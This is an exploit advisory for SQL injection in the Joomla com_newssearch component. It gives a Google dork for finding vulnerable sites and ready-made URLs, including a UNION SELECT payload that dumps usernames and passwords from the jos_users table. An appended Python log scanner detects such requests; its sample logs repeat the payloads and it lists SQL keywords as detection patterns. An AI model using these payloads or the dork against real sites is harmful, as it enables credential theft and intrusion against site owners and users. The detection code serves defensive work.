The Joomla Newssearch component suffers from a remote SQL injection vulnerability.
# Exploit Title: Joomla Component (com_newssearch) SQL Injection Vulnerability
# Google Dork: allinurl: index.php?com_newssearch
# Date: 7/15/2011
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Tested on: [Linux/Windows 7]
# Vulnerable Parameters: id=
##############################################################
Exploit:
http://www.example.com/index.php?option=com_newssearch&type=detail&section=2&id=15'
http://www.example.com/index.php?option=com_newssearch&type=detail&section=2&id=-1 union all select group_concat(username,0x3a,password,0x0a),2,3,4 from jos_users
##############################################################
www.websiteauditing.org
www.areyousecure.net
# Shouts to the Belegit crew
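
Detection side of the issue above, as an added example that is not part of the original advisory: a log scanner that flags com_newssearch requests whose id parameter is not a plain integer. The combined access-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A legitimate record id is a plain non-negative integer.
VALID_ID_RE = re.compile(r"\d{1,10}")
# Keywords used only to label the alert; the id is already invalid without them.
SQL_HINT_RE = re.compile(r"\b(union|select|group_concat|from)\b", re.I)

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jul/2011:10:00:01 +0000] "GET /index.php?option=com_newssearch'
    '&type=detail&section=2&id=15 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [15/Jul/2011:10:00:07 +0000] "GET /index.php?option=com_newssearch'
    '&type=detail&section=2&id=15%27 HTTP/1.1" 500 312',
    '192.0.2.44 - - [15/Jul/2011:10:00:09 +0000] "GET /index.php?option=com_newssearch'
    '&type=detail&section=2&id=-1%20union%20all%20select%20group_concat(username,0x3a,'
    'password,0x0a),2,3,4%20from%20jos_users HTTP/1.1" 200 900',
    '192.0.2.10 - - [15/Jul/2011:10:00:12 +0000] "GET /index.php?option=com_content'
    '&id=7%27 HTTP/1.1" 200 100',
]


def check_request(url):
    """Return a reason string if the request carries a suspicious id, else None."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if query.get("option", [""])[-1].lower() != "com_newssearch":
        return None  # only the component named in the advisory is in scope
    for value in query.get("id", []):  # parse_qs has already URL-decoded the value
        if VALID_ID_RE.fullmatch(value):
            continue
        if SQL_HINT_RE.search(value):
            return "sql-keywords-in-id"
        return "non-numeric-id"
    return None


def scan(lines):
    """Return (client_ip, reason, url) for each flagged access-log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line this scanner understands
        reason = check_request(m.group(1))
        if reason:
            hits.append((line.split(" ", 1)[0], reason, m.group(1)))
    return hits
```

The rule is deliberately strict: any id that is not a plain integer is reported, so encodings the keyword list does not name are still caught as non-numeric-id.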